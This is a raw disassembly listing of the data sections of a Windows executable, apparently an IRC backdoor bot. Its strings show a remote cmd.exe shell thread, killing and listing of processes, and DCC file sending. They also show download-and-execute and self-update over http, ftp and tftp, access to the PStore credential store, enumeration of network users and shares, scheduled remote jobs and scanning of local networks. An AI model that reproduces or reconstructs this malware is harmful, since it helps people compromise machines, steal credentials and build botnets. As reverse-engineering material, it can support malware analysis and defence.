dword_4170D4 dd 77E6D75Bh ; DATA XREF: sub_409226+14�r
; sub_4092A4+14�r ...
dword_4170D8 dd 77E802FCh ; DATA XREF: sub_409226+A�r
; sub_4092A4+A�r ...
dword_4170DC dd 77E7176Ch ; DATA XREF: .text:00409407�r
dword_4170E0 dd 77E75CEBh ; DATA XREF: sub_4098F3+A2�r
; sub_4098F3+1B6�r
dword_4170E4 dd 77E79908h ; DATA XREF: sub_409C36+2E�r
dword_4170E8 dd 77E80656h ; DATA XREF: .text:0040131B�r
; sub_406643+19�r
dword_4170EC dd 77F7E21Fh ; DATA XREF: sub_409C6C+6�r
dword_4170F0 dd 77E79CE3h ; DATA XREF: .text:00401A99�r
dword_4170F4 dd 77E78C17h ; DATA XREF: .text:00416822�r
dword_4170F8 dd 77E7C2C4h ; DATA XREF: .text:00416899�r
dd 77E73167h, 77E73BEFh
dword_417104 dd 77E7AC5Eh ; DATA XREF: sub_4148CE+B0�r
dword_417108 dd 77E76432h ; DATA XREF: sub_40D871+29B�r
dword_41710C dd 77F7E300h ; DATA XREF: sub_409C7A+6�r
dd 0
dword_417114 dd 77C1C055h ; DATA XREF: sub_416F7A�r
dword_417118 dd 77C423F5h ; DATA XREF: sub_416F80�r
dword_41711C dd 77C219F5h ; DATA XREF: sub_416FA2�r
dd 77C20C5Bh, 77C21AD8h
dword_417128 dd 77C43150h ; DATA XREF: sub_416E02�r
dword_41712C dd 77C41FA0h ; DATA XREF: sub_416B3A�r
dword_417130 dd 77C33FDEh ; DATA XREF: sub_416DFC�r
dword_417134 dd 77C33FC1h ; DATA XREF: sub_416DF6�r
dword_417138 dd 77C3CE0Ch ; DATA XREF: sub_416DF0�r
dword_41713C dd 77C42D60h ; DATA XREF: sub_416DEA�r
dword_417140 dd 77C1C6F3h ; DATA XREF: sub_416DE4�r
dword_417144 dd 77C435C0h ; DATA XREF: sub_416DDE�r
dword_417148 dd 77C3E5D9h ; DATA XREF: sub_416DD8�r
dword_41714C dd 77C28925h ; DATA XREF: sub_416DD2�r
dword_417150 dd 77C28933h ; DATA XREF: sub_416DCC�r
dword_417154 dd 77C3CCE7h ; DATA XREF: sub_416DC6�r
dword_417158 dd 77C37FEDh ; DATA XREF: sub_416DC0�r
dword_41715C dd 77C33EB0h ; DATA XREF: .text:00416DBC�o
dword_417160 dd 77C4B940h ; DATA XREF: sub_416CFE�r
dword_417164 dd 77C4B120h ; DATA XREF: sub_416CF8�r
dword_417168 dd 77C37ADCh ; DATA XREF: sub_416BFC�r
dword_41716C dd 77C2AC58h ; DATA XREF: sub_416BF6�r
dword_417170 dd 77C438C0h ; DATA XREF: sub_416BF0�r
dword_417174 dd 77C3C93Ch ; DATA XREF: sub_416BAE�r
dword_417178 dd 77C43AB0h ; DATA XREF: sub_416BA8�r
dword_41717C dd 77C3E8C0h ; DATA XREF: sub_416BA2�r
dword_417180 dd 77C1BE00h ; DATA XREF: sub_416B9C�r
dword_417184 dd 77C3E140h ; DATA XREF: sub_416B96�r
dword_417188 dd 77C3DFB5h ; DATA XREF: sub_416B90�r
dword_41718C dd 77C3BF06h ; DATA XREF: sub_416B88�r
dword_417190 dd 77C3D8F6h ; DATA XREF: sub_416B82�r
dword_417194 dd 77C3E4B9h ; DATA XREF: sub_416B7C�r
dword_417198 dd 77C3E303h ; DATA XREF: sub_416B76�r
dword_41719C dd 77C41FB0h ; DATA XREF: sub_416B70�r
dword_4171A0 dd 77C43490h ; DATA XREF: sub_416B6A�r
dword_4171A4 dd 77C46553h ; DATA XREF: sub_416B64�r
dword_4171A8 dd 77C3C813h ; DATA XREF: sub_416B5E�r
dword_4171AC dd 77C43900h ; DATA XREF: sub_416B58�r
dword_4171B0 dd 77C42E10h ; DATA XREF: sub_416B52�r
dword_4171B4 dd 77C2AA6Bh ; DATA XREF: sub_416B4C�r
dword_4171B8 dd 77C2AC46h ; DATA XREF: sub_416B46�r
dword_4171BC dd 77C43710h ; DATA XREF: sub_416B40�r
dword_4171C0 dd 77C421A2h ; DATA XREF: sub_416F74�r
align 8
dword_4171C8 dd 7713BC68h ; DATA XREF: .text:00416E92�r
align 10h
dword_4171D0 dd 77428B97h ; DATA XREF: sub_401D6E+2D�r
; .text:004031CD�r ...
align 8
dword_4171D8 dd 77D4456Bh ; DATA XREF: sub_40A9CF+121�r
dd 77D79D1Ch
dword_4171E0 dd 77D4C96Ah ; DATA XREF: sub_406D90+B0�r
; .text:004090FF�r ...
dword_4171E4 dd 77D5C13Ah ; DATA XREF: sub_40A9CF+128�r
; .text:00415BE4�r
dword_4171E8 dd 77D4BDCAh ; DATA XREF: sub_40D734+B�r
dword_4171EC dd 77D4702Fh ; DATA XREF: sub_40D74D+6C�r
; sub_40D74D+7E�r
dd 0
dword_4171F4 dd 71AB3E5Dh ; DATA XREF: sub_404FE7+C5�r
; sub_4050EA+106�r ...
dword_4171F8 dd 71AB1B7Bh ; DATA XREF: sub_416E30�r
dword_4171FC dd 71AB868Dh ; DATA XREF: sub_4048EF+11E�r
; sub_4048EF+39F�r
dword_417200 dd 71AB8629h ; DATA XREF: sub_40538D+8�r
; sub_412A3A+178�r ...
dword_417204 dd 71AB3F8Dh ; DATA XREF: sub_4046BC+114�r
; .text:00405660�r ...
dword_417208 dd 71AB3ECEh ; DATA XREF: sub_4046BC+129�r
; .text:00411EA4�r ...
dword_41720C dd 71AB1AF4h ; DATA XREF: sub_4053BF+F�r
; sub_40A9CF+1A74�r
dword_417210 dd 71ABF628h ; DATA XREF: sub_4044F7+21�r
; sub_4045B2+21�r
dword_417214 dd 71AB155Ah ; DATA XREF: sub_404457+1C�r
; sub_40447B+10�r
dword_417218 dd 71AB3C22h ; DATA XREF: sub_40432E+A�r
; sub_4046BC+CE�r ...
dword_41721C dd 71AB401Ch ; DATA XREF: .text:0040392C�r
; .text:004074D5�r ...
dword_417220 dd 71ABD755h ; DATA XREF: .text:0040398A�r
; .text:00403A2B�r ...
dword_417224 dd 71AB1740h ; DATA XREF: .text:0040399F�r
; .text:00403A40�r ...
dword_417228 dd 71ABD850h ; DATA XREF: .text:00403B47�r
dword_41722C dd 71AB1890h ; DATA XREF: sub_4048EF+265�r
; sub_404E1C+E0�r ...
dword_417230 dd 71AB1A6Dh ; DATA XREF: sub_4053B1+6�r
; sub_40A9CF+1A80�r ...
dword_417234 dd 71AB350Dh ; DATA XREF: .text:004035AB�r
; .text:004035D2�r ...
dword_417238 dd 71AB1746h ; DATA XREF: .text:00403642�r
; .text:00403786�r ...
dword_41723C dd 71AB2BBFh ; DATA XREF: .text:004036D9�r
; .text:004056D8�r ...
dword_417240 dd 71AB157Eh ; DATA XREF: .text:0040217B�r
; sub_40449C+21�r ...
dword_417244 dd 71AB12F8h ; DATA XREF: .text:004022BC�r
; .text:004056C2�r ...
dword_417248 dd 71AB5690h ; DATA XREF: .text:00401F3E�r
; sub_4053DC+27�r ...
dword_41724C dd 71AB12A7h ; DATA XREF: .text:00401F79�r
; .text:004022C3�r
dword_417250 dd 71AB1ED3h ; DATA XREF: .text:00405DD7�r
; .text:00412137�r ...
dword_417254 dd 71AB1836h ; DATA XREF: sub_406E8E+2AB�r
; sub_407148+183�r ...
dword_417258 dd 71AB1444h ; DATA XREF: .text:00412066�r
dword_41725C dd 71AB14DCh ; DATA XREF: .text:004160C0�r
dword_417260 dd 71AB32CAh ; DATA XREF: .text:00415FEA�r
dword_417264 dd 71AB41DAh ; DATA XREF: .text:004169F2�r
dword_417268 dd 71AB5DE2h ; DATA XREF: sub_4046BC+14D�r
align 10h
flt_417270 dd 1.0e3 ; DATA XREF: .text:0040203F�r
; .text:00402067�r ...
flt_417274 dd 1.024e3 ; DATA XREF: .text:00408DD2�r
dword_417278 dd 0FFFFFFFFh, 409449h, 40945Fh, 0 ; DATA XREF: .text:004093BB�o
dword_417288 dd 0FFFFFFFFh, 409572h, 40958Ah, 0 ; DATA XREF: .text:004094EB�o
dword_417298 dd 0FFFFFFFFh, 416AE7h, 416AFDh, 0 ; DATA XREF: .text:004167F6�o
dd 416AC5h, 416ADBh, 4172F0h
off_4172B4 dd offset byte_416F05, offset dword_417338, offset word_416F86
; DATA XREF: sub_416ED3+12�o
; .rdata:004172D8�o
dd offset dword_41DDE0, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4172B4+0Ch
dd 3 dup(0)
dd 1, 4172D8h, 3 dup(0)
dd 41DDE0h, 4172E0h, 0
off_417308 dd offset aRa, 2 dup(0) ; DATA XREF: .rdata:00417320�o
; "¼rA"
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_417308
align 10h
dd 1, 417320h
dword_417338 dd 3 dup(0) ; DATA XREF: .rdata:off_4172B4�o
dd 41DE00h, 417328h, 0
dd 19930520h, 4, 417370h, 5 dup(0)
dd 0FFFFFFFFh, 416FB0h, 0
dd 416FBCh, 1, 416FC5h, 2, 416FD1h, 0
dd offset dword_41DDE0, 0
dd 0FFFFFFFFh, 0
dd 10h, 416F21h, 0
dword_4173B0 dd 1, 417390h ; DATA XREF: .rdata:004173C4�o
dword_4173B8 dd 0 ; DATA XREF: sub_416EAF+19�o
dd 416F4Eh, 0
dd offset dword_4173B0
dd 400000h, 2 dup(0)
dd 3 dup(400000h), 2 dup(0)
dd 3 dup(400000h), 2 dup(0)
dd 3 dup(400000h), 2 dup(0)
dd 3 dup(400000h), 2 dup(0)
dd 3 dup(400000h), 2 dup(0)
dd 3 dup(400000h), 2 dup(0)
dd 2 dup(400000h), 5 dup(0)
dd 0Bh dup(400000h), 0
dd 38h dup(400000h), 0
dd 2Ch dup(400000h), 0
dd 400000h, 0
dd 400000h, 0
dd 6 dup(400000h), 0
dd 1Eh dup(400000h), 0
dd 74730000h, 79706372h, 0
aStrlen db 'strlen',0
align 4
dd 616D0000h, 636F6C6Ch, 0
aFree_0 db 'free',0
align 10h
aMemcpy db 'memcpy',0
align 4
dd 74730000h, 70636E72h, 79h, 69727073h, 66746Eh, 6C630000h
dd 6B636Fh, 656D0000h, 7465736Dh, 0
aStrcat db 'strcat',0
align 4
dd 74660000h, 6C6C65h, 77660000h, 65746972h, 0
aFclose db 'fclose',0
align 4
dd 6F660000h, 6E6570h, 72660000h, 646165h, 73660000h, 6B6565h
dd 74610000h, 696Fh, 73730000h, 666E6163h, 0
aStrstr db 'strstr',0
align 4
dd 735F0000h, 6972706Eh, 66746Eh, 74730000h, 6D636E72h
dd 70h, 6C616572h, 636F6Ch, 78650000h, 7469h, 665F0000h
dd 6C6F74h, 65630000h, 6C69h, 655F0000h, 70656378h, 61685F74h
dd 656C646Eh, 3372h, 625F0000h, 6E696765h, 65726874h, 78656461h
dd 0
aVsprintf db 'vsprintf',0
align 4
a??3@yaxpax@z db '??3@YAXPAX@Z',0
align 4
a??2@yapaxi@z db '??2@YAPAXI@Z',0
align 4
aPrintf db 'printf',0
align 4
dd 74730000h, 706D6372h, 0
aTolower db 'tolower',0
dd 656D0000h, 706D636Dh, 0
a_vsnprintf db '_vsnprintf',0
align 4
dd 725F0000h, 6C746Fh, 725F0000h, 72746Fh, 656D0000h, 766F6D6Dh
dd 65h, 78435F5Fh, 61724678h, 6148656Dh, 656C646Eh, 534D0072h
dd 54524356h, 6C6C642Eh, 0
aWsaioctl db 'WSAIoctl',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 4
aDeletefilea db 'DeleteFileA',0
dd 65530000h, 6C694674h, 74744165h, 75626972h, 41736574h
dd 0
aClosehandle db 'CloseHandle',0
dd 65540000h, 6E696D72h, 50657461h, 65636F72h, 7373h, 6C530000h
dd 706565h, 65520000h, 72506461h, 7365636Fh, 6D654D73h
dd 79726Fh, 704F0000h, 72506E65h, 7365636Fh, 73h, 4D746547h
dd 6C75646Fh, 6C694665h, 6D614E65h, 4165h, 65470000h, 646F4D74h
dd 48656C75h, 6C646E61h, 4165h, 65470000h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 64h, 64616552h, 656C6946h, 0
aGetexitcodepro db 'GetExitCodeProcess',0
align 4
dd 65500000h, 614E6B65h, 5064656Dh, 657069h, 72430000h
dd 65746165h, 636F7250h, 41737365h, 0
aDuplicatehandl db 'DuplicateHandle',0
dd 65470000h, 72754374h, 746E6572h, 636F7250h, 737365h
dd 72430000h, 65746165h, 65706950h, 0
aSearchpatha db 'SearchPathA',0
dd 72570000h, 46657469h, 656C69h, 65470000h, 73614C74h
dd 72724574h, 726Fh, 6F430000h, 69467970h, 41656Ch, 78450000h
dd 72507469h, 7365636Fh, 73h, 50746547h, 41636F72h, 65726464h
dd 7373h, 6F4C0000h, 694C6461h, 72617262h, 4179h, 65470000h
dd 73795374h, 446D6574h, 63657269h, 79726F74h, 41h, 46746553h
dd 54656C69h, 656D69h, 65470000h, 6C694674h, 6D695465h
dd 65h, 61657243h, 69466574h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 736C0000h, 656C7274h
dd 416Eh, 65530000h, 72754374h, 746E6572h, 65726944h, 726F7463h
dd 4179h, 65470000h, 636F4C74h, 49656C61h, 416F666Eh, 0
aGetversionexa db 'GetVersionExA',0
align 4
aGetcomputernam db 'GetComputerNameA',0
align 4
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
dd 65470000h, 73694474h, 6572466Bh, 61705365h, 78456563h
dd 41h, 44746547h, 65766972h, 65707954h, 41h, 54746547h
dd 436B6369h, 746E756Fh, 0
aQueryperforman db 'QueryPerformanceFrequency',0
align 4
aQueryperform_0 db 'QueryPerformanceCounter',0
dd 73490000h, 43646142h, 5065646Fh, 7274h, 65540000h, 6E696D72h
dd 54657461h, 61657268h, 64h, 74696E49h, 696C6169h, 7243657Ah
dd 63697469h, 65536C61h, 6F697463h, 6Eh, 65746E45h, 69724372h
dd 61636974h, 6365536Ch, 6E6F6974h, 0
aLeavecriticals db 'LeaveCriticalSection',0
align 4
aCreatethread db 'CreateThread',0
align 4
aUnmapviewoffil db 'UnmapViewOfFile',0
dd 614D0000h, 65695670h, 46664F77h, 656C69h, 72430000h
dd 65746165h, 656C6946h, 7070614Dh, 41676E69h, 0
aLstrcmpa db 'lstrcmpA',0
align 10h
aGetenvironment db 'GetEnvironmentVariableA',0
dd 736C0000h, 70637274h, 416E79h, 736C0000h, 70637274h
dd 4179h, 72430000h, 65746165h, 6574754Dh, 4178h, 65530000h
dd 72724574h, 6F4D726Fh, 6564h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 0
aWsprintfa db 'wsprintfA',0
align 4
aGetwindowtexta db 'GetWindowTextA',0
align 4
dd 65470000h, 726F4674h, 6F726765h, 57646E75h, 6F646E69h
dd 77h, 646E6946h, 646E6957h, 41776Fh, 65530000h, 654D646Eh
dd 67617373h, 4165h, 73490000h, 72616843h, 68706C41h, 6D754E61h
dd 63697265h, 53550041h, 32335245h, 6C6C642Eh, 0
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 6C654467h, 56657465h, 65756C61h, 41h, 45676552h
dd 566D756Eh, 65756C61h, 41h, 4F676552h, 4B6E6570h, 78457965h
dd 41h, 51676552h, 79726575h, 756C6156h, 41784565h, 0
aRegsetvalueexa db 'RegSetValueExA',0
align 4
dd 65520000h, 65724367h, 4B657461h, 78457965h, 41h, 55746547h
dd 4E726573h, 41656D61h, 0
aCryptreleaseco db 'CryptReleaseContext',0
dd 72430000h, 47747079h, 61526E65h, 6D6F646Eh, 0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
dd 68530000h, 456C6C65h, 75636578h, 416574h, 4C454853h
dd 2E32334Ch, 6C6C64h, 735F0000h, 6D637274h, 6970h, 695F0000h
dd 616F74h, 735F0000h, 696E7274h, 706D63h, 435F0000h, 68547878h
dd 45776F72h, 70656378h, 6E6F6974h, 0
a??1type_info@@ db '??1type_info@@UAE@XZ',0
align 4
aLocalfree db 'LocalFree',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 200h
_rdata ends
; Section 3. (virtual address 00018000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00018000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 418000h
off_418000 dd offset dword_418098 ; DATA XREF: sub_401000+1D�r
; sub_401000+2E�r
dd offset dword_41805C
dd offset dword_418040
dd offset dword_418014
dd 0
dword_418014 dd 0E4E4BFB1h, 0FD92B7D8h, 0B6ACE2BDh, 0DEB4A195h, 0DFC5928Ch
; DATA XREF: .data:0041800C�o
dd 0CAABA9F1h, 0BDB1D394h, 0DD98A78Fh, 0D1C4AABEh, 2 dup(0)
dword_418040 dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0FFEB9284h
; DATA XREF: .data:00418008�o
dd 0BFD1h, 0
dword_41805C dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: .data:00418004�o
dd 0D1AA94F4h, 9082E3BFh, 0D485A78Eh, 0D5E1928Ch, 0D1A789EFh
dd 0A68CCCA6h, 0C3928695h, 0D5D48F94h, 0EEh, 0
dword_418098 dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: .data:off_418000�o
dd 0D1AA94F4h, 9082E3BFh, 0D485A78Eh, 0D5E1928Ch, 0D1A789EFh
dd 0A68CCCA6h, 95h, 0
dword_4180CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: .text:00401771�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4180F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: .text:0040174E�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41811C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: .text:00401656�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_418144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: .text:00401289�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_418174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4017AA+93�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4017AA:loc_401830�o
aListing db 'Listing',0 ; DATA XREF: sub_4017AA+7D�o
dword_4181A4 dd 303h ; DATA XREF: sub_4018AF:loc_401942�o
aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: .text:00401C4A�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: .text:00401BFF�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: .text:004019C9�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_401D6E+B9�o
align 4
asc_418214 db 0Dh,0Ah,0 ; DATA XREF: sub_401D6E:loc_401E0B�o
; .text:00403F7F�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_401D6E+7E�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401D6E+26�o
; .text:004031C6�o ...
align 4
dword_418234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: .text:00402080�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_418280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: .text:00401F04�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4182AC dd 6277h ; DATA XREF: .text:00401E6E�o
; sub_402698:loc_40288E�o ...
dword_4182B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: .text:004024A3�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4182F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: .text:004023D5�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_418320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: .text:00402350�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_418348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: .text:004022D1�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: .text:00402294�o
align 4
aRb db 'rb',0 ; DATA XREF: .text:loc_40220F�o
; sub_406AE7+63�o ...
align 4
dword_41837C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_4024F3+101�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4183A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_40260D+72�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402698+155�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402698+104�o
align 4
asc_4183EC db 0Dh,0Ah ; DATA XREF: sub_402698:loc_402758�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402698+3A�o
; sub_4088FC+E9�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_418414 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: .text:00403228�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_418444 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: .text:00403203�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_41846C dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: .text:0040316A�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
aExecuting db ', executing',0 ; DATA XREF: .text:004030E2�o
aUpdating db ', updating',0 ; DATA XREF: .text:004030CB�o
align 4
unk_4184CC db 2Dh ; - ; DATA XREF: .text:00402F40�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_4184F8: ; DATA XREF: .text:loc_402F16�o
unicode 0, </>,0
asc_4184FC: ; DATA XREF: .text:00402E91�o
unicode 0, <:>,0
unk_418500 db 2Dh ; - ; DATA XREF: .text:00402E16�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 4
a69 db '69',0 ; DATA XREF: .text:00402DDA�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: .text:00402DB9�o
aAnonymous db 'anonymous',0 ; DATA XREF: .text:00402D8C�o
; .text:00402D9F�o
align 4
a21 db '21',0 ; DATA XREF: .text:00402D5A�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: .text:00402D39�o
align 10h
a80 db '80',0 ; DATA XREF: .text:00402D00�o
; sub_4043E9+27�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: .text:00402CDF�o
dword_41855C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: .text:00402B67�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41858C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: .text:00402B42�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
aFile db 'file://',0 ; DATA XREF: .text:00402AF2�o
dword_4185CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: .text:00402ADC�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4185FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_403260+B2�o
dd 206F7420h, 2343003h, 2037325h, 0
a_exe db '.exe',0 ; DATA XREF: sub_403260+43�o
; sub_412720+51�o
align 4
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: .text:loc_403538�o
; .text:loc_403545�o ...
align 4
aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: .text:0040352B�o
; sub_40A9CF:loc_40BD52�o
align 4
dword_41864C dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: .text:004034C7�o
aModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: .text:loc_40342A�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: .text:0040341E�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: .text:loc_40340C�o
align 4
aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: .text:loc_403403�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0 ; DATA XREF: .text:loc_4033FA�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: .text:loc_4033F1�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: .text:loc_4033E8�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: .text:loc_4033DF�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: .text:loc_4033D6�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: .text:00403352�o
aUdp db 'udp',0 ; DATA XREF: .text:00403B36�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_403BD3+20B�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_403BD3:loc_403DCA�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_403BD3+1E4�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_403BD3:loc_403DA3�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_403BD3+184�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_403BD3+171�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_403BD3+15E�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_403BD3:loc_403D23�o
align 10h
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_403BD3+13D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_403BD3+12A�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_403BD3+117�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_403BD3+104�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_403BD3:loc_403CC3�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_403BD3+DD�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_403BD3+CA�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_403BD3+B7�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_403BD3+A4�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_403BD3+91�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_403BD3+7E�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_403BD3+6B�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_403BD3+58�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_403BD3+45�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_403BD3:loc_403C00�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_403BD3+1A�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_403BD3+6�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: .text:loc_403F57�o
dword_4189C4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: .text:00403E61�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4189F8 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_403FE5+7E�o
dd 30032074h, 73250234h, 203h
dword_418A18 dd 333131h ; DATA XREF: sub_403FE5:loc_403FFD�o
aXsUlsbNP db '•‘Àž«˜¡Ð¾°¶',0 ; DATA XREF: sub_4043E9+6�o
align 10h
a10_ db '10.',0 ; DATA XREF: sub_4041B7+56�o
a192_168_ db '192.168.',0 ; DATA XREF: sub_4041B7+3B�o
align 10h
